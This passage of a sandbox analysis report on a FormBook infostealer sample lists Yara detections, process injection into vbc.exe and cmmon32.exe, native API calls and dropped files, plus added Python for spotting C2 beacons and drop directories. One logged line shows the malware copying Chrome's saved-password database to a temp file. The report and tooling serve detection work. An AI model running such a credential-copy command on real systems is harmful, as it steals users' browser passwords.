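    return Request(method, parts.path, parts.query, headers, body)


def split_form(s):
    """Split on '&' and the first '=' only, with no percent-decoding:
    urllib.parse.parse_qsl would turn the '+' inside the blobs into spaces."""
    pairs = []
    for item in s.split("&"):
        if item:
            key, _, value = item.partition("=")
            pairs.append((key, value))
    return pairs


def beacon_fields(req):
    """Key/value pairs the request carries: the POST form body, or the GET query."""
    if req.method == "POST":
        return split_form(req.body.rstrip("\x00"))
    return split_form(req.query)


PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")          # one short directory, e.g. /p12s/
BLOB_RE = re.compile(r"^[A-Za-z0-9+/_~().-]{8,}$")     # opaque base64-like value, no % escapes


def is_formbook_like(req):
    """Heuristic (assumption) drawn from the report's requests: short single-directory
    path, opaque blob values, and either a urlencoded POST whose Origin is the C2 host
    itself or a GET with no headers beyond Host and Connection (no User-Agent/Accept)."""
    if not PATH_RE.match(req.path):
        return False
    fields = beacon_fields(req)
    if not fields or not all(BLOB_RE.match(v) for _, v in fields):
        return False
    host = req.headers.get("host", "")
    if req.method == "POST":
        return (req.headers.get("content-type") == "application/x-www-form-urlencoded"
                and req.headers.get("origin") == f"http://{host}")
    return req.method == "GET" and set(req.headers) <= {"host", "connection"}


def extract_iocs(reqs):
    hits = [r for r in reqs if is_formbook_like(r)]
    values = Counter(v for r in hits for _, v in beacon_fields(r))
    return {
        "hosts": sorted({r.headers["host"] for r in hits}),
        "paths": sorted({r.path for r in hits}),
        "field_names": sorted({k for r in hits for k, _ in beacon_fields(r)}),
        # a value repeated across requests (here q88dJ=WbLp3RdxCDJd) is the stable pivot
        "pivot_values": sorted(v for v, n in values.items() if n > 1),
    }


def correlate_strings(strings, hosts):
    """Split memory strings into those matching a host actually contacted and the rest;
    the rest here are font-licence URLs, often with trailing bytes fused on ('.comalic')."""
    out = {"corroborated": [], "uncorroborated": []}
    for s in strings:
        rest = re.sub(r"^https?://", "", s)
        hit = any(rest == h or rest.startswith((h + "/", h + "?")) for h in hosts)
        out["corroborated" if hit else "uncorroborated"].append(s)
    return out


if __name__ == "__main__":
    reqs = [parse_request(r) for r in SAMPLE_REQUESTS]
    iocs = extract_iocs(reqs)
    print(iocs)
    print(correlate_strings(MEMORY_STRINGS, iocs["hosts"]))
```

Two details the heuristic leans on are visible in the report itself: the GETs carry only Host and Connection (no User-Agent or Accept), and q88dJ=WbLp3RdxCDJd is identical across both hosts while the 3f= blob changes, so the repeated value is the better pivot than the blob. Keep parse_qsl away from these values; the '+' and '/' inside them are part of the encoding, not form escapes.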

          E-Banking Fraud

          Source: Yara matchFile source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: C:\Windows\SysWOW64\cmmon32.exe | Dropped file: C:\Users\user\AppData\Roaming\3NM010Q7\3NMlogri.ini
          Source: C:\Windows\SysWOW64\cmmon32.exe | Dropped file: C:\Users\user\AppData\Roaming\3NM010Q7\3NMlogrv.ini
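A hunt for that drop directory, as an added example that is not part of the report. It generalises the naming seen in the two dropped files (an 8-character upper-case alphanumeric directory under Roaming whose first three characters prefix each <prefix>log<xx>.ini inside it), which is an assumption beyond what the report states; the directory tree it scans is constructed in a scratch folder and the function names are this example's own. Note that the report attributes both writes to the injected C:\Windows\SysWOW64\cmmon32.exe rather than to the original sample, so a file-creation rule keyed on the dropper's image name would miss them.

```python
"""Hunt for the FormBook-style drop directory the report lists under
%APPDATA%\\Roaming (3NM010Q7 holding 3NMlogri.ini and 3NMlogrv.ini).

Added example, not part of the report. The naming rule is generalised
from those two files and is an assumption; the sample tree is constructed.
"""
import re
import tempfile
from pathlib import Path

DIR_RE = re.compile(r"^[A-Z0-9]{8}$")                                 # 3NM010Q7
FILE_RE = re.compile(r"^(?P<prefix>[A-Z0-9]{3})log[a-z]{2}\.ini$")    # 3NMlogri.ini, 3NMlogrv.ini


def find_drop_dirs(roaming):
    """Map each suspicious directory under Roaming to the log files inside it.
    A file only counts when its three-character prefix equals the directory's."""
    hits = {}
    for d in Path(roaming).iterdir():
        if not (d.is_dir() and DIR_RE.match(d.name)):
            continue
        files = []
        for f in d.iterdir():
            m = FILE_RE.match(f.name)
            if f.is_file() and m and m["prefix"] == d.name[:3]:
                files.append(f.name)
        if files:
            hits[d.name] = sorted(files)
    return hits


def build_sample_tree(root):
    """Constructed tree: the report's directory plus two decoys that must not match."""
    roaming = Path(root) / "AppData" / "Roaming"
    drop = roaming / "3NM010Q7"
    drop.mkdir(parents=True)
    for name in ("3NMlogri.ini", "3NMlogrv.ini"):
        (drop / name).write_bytes(b"")
    (roaming / "Microsoft").mkdir()                     # ordinary profile content
    decoy = roaming / "ABCDEFGH"
    decoy.mkdir()
    (decoy / "XYZlogri.ini").write_bytes(b"")           # prefix does not match the directory
    return roaming


def run_sample():
    """Build the constructed tree in a scratch directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return find_drop_dirs(build_sample_tree(tmp))


if __name__ == "__main__":
    print(run_sample())
```

Point find_drop_dirs at each user's real AppData\Roaming on a suspect host; the prefix check is what keeps an eight-character vendor directory from showing up as a false positive.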
          Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: initial sampleStatic PE information: Filename: PO#12108997.exe
          Source: PO#12108997.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Matched rules: both Yara rules below matched on every source listed after them.
  Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
  Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Sources of type UNPACKEDPE (each matched Formbook_1 and Formbook):
  4.0.vbc.exe.400000.0.unpack
  4.0.vbc.exe.400000.2.unpack
  4.0.vbc.exe.400000.1.raw.unpack
  4.0.vbc.exe.400000.2.raw.unpack
  4.2.vbc.exe.400000.0.unpack
  4.2.vbc.exe.400000.0.raw.unpack
  0.2.PO#12108997.exe.45a9b80.7.raw.unpack
  4.0.vbc.exe.400000.1.unpack
  0.2.PO#12108997.exe.4525160.6.raw.unpack
Sources of type MEMORY (each matched Formbook_1 and Formbook):
  00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp
  00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp
  00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp
  00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp
  00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp
  00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp
  00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp
  00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp
  00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp
  00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp
  00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\PO#12108997.exe | Code functions:
  0_2_01B94360, 0_2_01B940B1, 0_2_01B940C0, 0_2_05DA4DD0, 0_2_05DAACD8, 0_2_05DAF851,
  0_2_05DAF860, 0_2_05DABA28, 0_2_092D9B90, 0_2_092D003B, 0_2_092D0040, 0_2_092D0BBD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code functions:
  4_2_00401030, 4_2_0041E83B, 4_2_0041ED4F, 4_2_0041E5CB, 4_2_00402D90, 4_2_00409E5B,
  4_2_00409E60, 4_2_0041EE02, 4_2_0041D754, 4_2_0041E7C3, 4_2_00402FB0, 4_2_05641D55,
  4_2_05642D07, 4_2_05570D20, 4_2_0558D5E0, 4_2_056425DD, 4_2_055A2581, 4_2_0563D466,
  4_2_0558841F, 4_2_05641FF1, 4_2_0564DFCE, 4_2_05596E30, 4_2_0563D616, 4_2_05642EF7,
  4_2_0557F900, 4_2_05594120, 4_2_055999BF, 4_2_0564E824, 4_2_05631002, 4_2_0559A830,
  4_2_056428EC, 4_2_0558B090, 4_2_056420A8, 4_2_055A20A0, 4_2_0559AB40, 4_2_05642B28,
  4_2_0563DBD2, 4_2_056303DA, 4_2_055AEBB0, 4_2_0562FA2B, 4_2_056422AE
Source: C:\Windows\SysWOW64\cmmon32.exe | Code functions:
  17_2_04A6841F, 17_2_04B1D466, 17_2_04A82581, 17_2_04A6D5E0, 17_2_04B225DD, 17_2_04A50D20,
  17_2_04B22D07, 17_2_04B21D55, 17_2_04B22EF7, 17_2_04A76E30, 17_2_04B1D616, 17_2_04B21FF1,
  17_2_04B2DFCE, 17_2_04A820A0, 17_2_04B220A8, 17_2_04A6B090, 17_2_04B228EC, 17_2_04B2E824,
  17_2_04A7A830, 17_2_04B11002, 17_2_04A799BF, 17_2_04A74120, 17_2_04A5F900, 17_2_04B222AE,
  17_2_04B0FA2B, 17_2_04A8EBB0, 17_2_04B1DBD2, 17_2_04B103DA, 17_2_04A8ABD8, 17_2_04B22B28,
  17_2_04A7A309, 17_2_04A7AB40, 17_2_007DE83B, 17_2_007DED4F, 17_2_007DE5CB, 17_2_007C2D90,
  17_2_007C9E60, 17_2_007C9E5B, 17_2_007DEE02, 17_2_007DE7C3, 17_2_007C2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: String function 0557B150 appears 72 times
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: String function 04A5B150 appears 87 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code functions calling native APIs:
  4_2_0041A360 NtCreateFile
  4_2_0041A410 NtReadFile
  4_2_0041A490 NtClose
  4_2_0041A540 NtAllocateVirtualMemory
  4_2_0041A35A NtCreateFile, NtReadFile
  4_2_0041A3B2 NtCreateFile
  4_2_0041A40A NtReadFile
  4_2_0041A5BA NtAllocateVirtualMemory
  4_2_055B9540 NtReadFile, LdrInitializeThunk
  4_2_055B95D0 NtClose, LdrInitializeThunk
  4_2_055B9710 NtQueryInformationToken, LdrInitializeThunk
  4_2_055B9780 NtMapViewOfSection, LdrInitializeThunk
  4_2_055B97A0 NtUnmapViewOfSection, LdrInitializeThunk
  4_2_055B9660 NtAllocateVirtualMemory, LdrInitializeThunk
  4_2_055B96E0 NtFreeVirtualMemory, LdrInitializeThunk
  4_2_055B9910 NtAdjustPrivilegesToken, LdrInitializeThunk
  4_2_055B99A0 NtCreateSection, LdrInitializeThunk
  4_2_055B9840 NtDelayExecution, LdrInitializeThunk
  4_2_055B9860 NtQuerySystemInformation, LdrInitializeThunk
  4_2_055B98F0 NtReadVirtualMemory, LdrInitializeThunk
  4_2_055B9A50 NtCreateFile, LdrInitializeThunk
  4_2_055B9A00 NtProtectVirtualMemory, LdrInitializeThunk
  4_2_055B9A20 NtResumeThread, LdrInitializeThunk
  4_2_055B9560 NtWriteFile
  4_2_055BAD30 NtSetContextThread
  4_2_055B9520 NtWaitForSingleObject
  4_2_055B95F0 NtQueryInformationFile
  4_2_055B9770 NtSetInformationFile
  4_2_055BA770 NtOpenThread
  4_2_055B9760 NtOpenProcess
  4_2_055BA710 NtOpenProcessToken
  4_2_055B9730 NtQueryVirtualMemory
  4_2_055B9FE0 NtCreateMutant
  4_2_055B9650 NtQueryValueKey
  4_2_055B9670 NtQueryInformationProcess
  4_2_055B9610 NtEnumerateValueKey
  4_2_055B96D0 NtCreateKey
  4_2_055B9950 NtQueueApcThread
  4_2_055B99D0 NtCreateProcessEx
  4_2_055BB040 NtSuspendThread
  4_2_055B9820 NtEnumerateKey
  4_2_055B98A0 NtWriteVirtualMemory
  4_2_055B9B00 NtSetValueKey
  4_2_055BA3B0 NtGetContextThread
  4_2_055B9A10 NtQuerySection
  4_2_055B9A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\cmmon32.exe | Code functions calling native APIs:
  17_2_04A995D0 NtClose, LdrInitializeThunk
  17_2_04A99560 NtWriteFile, LdrInitializeThunk
  17_2_04A99540 NtReadFile, LdrInitializeThunk
  17_2_04A996E0 NtFreeVirtualMemory, LdrInitializeThunk
  17_2_04A996D0 NtCreateKey, LdrInitializeThunk
  17_2_04A99610 NtEnumerateValueKey, LdrInitializeThunk
  17_2_04A99660 NtAllocateVirtualMemory, LdrInitializeThunk
  17_2_04A99650 NtQueryValueKey, LdrInitializeThunk
  17_2_04A99780 NtMapViewOfSection, LdrInitializeThunk
  17_2_04A99FE0 NtCreateMutant, LdrInitializeThunk
  17_2_04A99710 NtQueryInformationToken, LdrInitializeThunk
  17_2_04A99770 NtSetInformationFile, LdrInitializeThunk
  17_2_04A99860 NtQuerySystemInformation, LdrInitializeThunk
  17_2_04A99840 NtDelayExecution, LdrInitializeThunk
  17_2_04A999A0 NtCreateSection, LdrInitializeThunk
  17_2_04A99910 NtAdjustPrivilegesToken, LdrInitializeThunk
  17_2_04A99A50 NtCreateFile, LdrInitializeThunk
  17_2_04A995F0 NtQueryInformationFile
  17_2_04A99520 NtWaitForSingleObject
  17_2_04A9AD30 NtSetContextThread
  17_2_04A99670 NtQueryInformationProcess
  17_2_04A997A0 NtUnmapViewOfSection
  17_2_04A99730 NtQueryVirtualMemory
  17_2_04A9A710 NtOpenProcessToken
  17_2_04A99760 NtOpenProcess
  17_2_04A9A770 NtOpenThread
  17_2_04A998A0 NtWriteVirtualMemory
  17_2_04A998F0 NtReadVirtualMemory
  17_2_04A99820 NtEnumerateKey
  17_2_04A9B040 NtSuspendThread
  17_2_04A999D0 NtCreateProcessEx
  17_2_04A99950 NtQueueApcThread
  17_2_04A99A80 NtOpenDirectoryObject
  17_2_04A99A20 NtResumeThread
  17_2_04A99A00 NtProtectVirtualMemory
  17_2_04A99A10 NtQuerySection
  17_2_04A9A3B0 NtGetContextThread
  17_2_04A99B00 NtSetValueKey
  17_2_007DA360 NtCreateFile
  17_2_007DA410 NtReadFile
  17_2_007DA490 NtClose
  17_2_007DA540 NtAllocateVirtualMemory
  17_2_007DA35A NtCreateFile, NtReadFile
  17_2_007DA3B2 NtCreateFile
  17_2_007DA40A NtReadFile
  17_2_007DA5BA NtAllocateVirtualMemory
          Source: PO#12108997.exeBinary or memory string: OriginalFilename vs PO#12108997.exe
          Source: PO#12108997.exe, 00000000.00000002.270009713.000000000180A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO#12108997.exe
          Source: PO#12108997.exe, 00000000.00000000.236724294.0000000000FB2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameActivityCont.exe6 vs PO#12108997.exe
          Source: PO#12108997.exe, 00000000.00000002.276802246.0000000007E80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs PO#12108997.exe
          Source: PO#12108997.exe, 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs PO#12108997.exe
          Source: PO#12108997.exeBinary or memory string: OriginalFilenameActivityCont.exe6 vs PO#12108997.exe
          Source: PO#12108997.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: PO#12108997.exeVirustotal: Detection: 34%
          Source: PO#12108997.exeReversingLabs: Detection: 61%
          Source: C:\Users\user\Desktop\PO#12108997.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\PO#12108997.exe "C:\Users\user\Desktop\PO#12108997.exe"
          Source: C:\Users\user\Desktop\PO#12108997.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmmon32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Users\user\Desktop\PO#12108997.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO#12108997.exe.log
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\DB1
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@2/2
Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\3NM010Q7\3NMlogri.ini
          Source: C:\Users\user\Desktop\PO#12108997.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3768:120:WilError_01
Source: C:\Windows\SysWOW64\cmmon32.exeFile written: C:\Users\user\AppData\Roaming\3NM010Q7\3NMlogri.ini
Source: PO#12108997.exe, rI/hS.csCryptographic APIs: 'CreateDecryptor'
Source: 0.0.PO#12108997.exe.fb0000.0.unpack, rI/hS.csCryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO#12108997.exe.fb0000.0.unpack, rI/hS.csCryptographic APIs: 'CreateDecryptor'
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\PO#12108997.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: PO#12108997.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: PO#12108997.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: PO#12108997.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: ActivityCont.pdb source: PO#12108997.exe
          Source: Binary string: cmmon32.pdb source: vbc.exe, 00000004.00000002.349181179.0000000005540000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: ActivityCont.pdbh source: PO#12108997.exe
          Source: Binary string: cmmon32.pdbGCTL source: vbc.exe, 00000004.00000002.349181179.0000000005540000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000004.00000002.349226595.0000000005550000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.349502353.000000000566F000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.268678658.000000000521F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.270731207.00000000053B2000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503794062.0000000004B4F000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503522121.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.348874642.0000000004700000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.350723138.0000000004899000.00000004.00000800.00020000.00000000.sdmp
